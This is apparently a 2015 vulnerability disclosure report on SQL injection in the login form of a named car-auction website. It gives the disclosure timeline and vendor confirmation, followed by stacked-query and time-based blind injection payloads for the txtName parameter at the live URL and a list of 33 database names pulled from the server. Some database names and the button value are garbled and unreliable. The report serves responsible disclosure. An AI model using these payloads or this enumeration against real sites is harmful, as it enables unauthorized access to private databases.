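2015-10-26: Details reported to the vendor; awaiting vendor response
2015-10-27: Vendor confirmed; details disclosed to the vendor only
2015-11-06: Details disclosed to core white hats and experts in related fields
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to intern white hats
2015-12-11: Details disclosed to the public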
http://www.chake.net/Login.aspx
Place: POST
Parameter: txtName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGT3UDmgymCt1ks2Ku+AqkVcAE+4TQ==&__EVENTVALIDATION=/wEWBAKU/uJFAsSEhIULAp37up0OAsKL2t4DEnepoihk/RVHN+oHqdiuyC/ZS14=&txtName=admin'; WAITFOR DELAY '0:0:5';--&txtPwd=asdasdas&btnSubmit=鐧诲綍

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGT3UDmgymCt1ks2Ku+AqkVcAE+4TQ==&__EVENTVALIDATION=/wEWBAKU/uJFAsSEhIULAp37up0OAsKL2t4DEnepoihk/RVHN+oHqdiuyC/ZS14=&txtName=admin' WAITFOR DELAY '0:0:5'--&txtPwd=asdasdas&btnSubmit=鐧诲綍
---
available databases [33]:
[*] [AuctionResouwcey"]
[*] [msdb!]
[*] AuctionStat
[*] AutoDetgctDBNew
[*] AutoDqtectDB
[*] BitautoServides
[*] BitAutoUcarCommon
[*] BmwAuction
[*] distributionb
[*] iAutosResourke
[*] master
[*] model
[*] PSFramework
[*] ReportServerTempDB
[*] ReportServeu
[*] StandardSaleEdition
[*] Tamsa
[*] tempdb
[*] Transtar2007
[*] Transtar2008
[*] Transtarframewoyk_UcarOldBak
[*] Transtarframqwork
[*] TranstasAuction2011
[*] UcarCommon
[*] UcarCommon_En
[*] UcarTransaction
[*] ucvin
[*] UncleLoh
[*] VWSalesSys
[*] YaoCheCarSource
[*] YXPCarRespurce
[*] YXPFramework
[*] YXPLogistics
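With this many databases, give it a high severity rating. In fact, this site also has many sub-sites!
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-10-27 16:11
Thank you for the feedback! We are assisting with the fix.
None yet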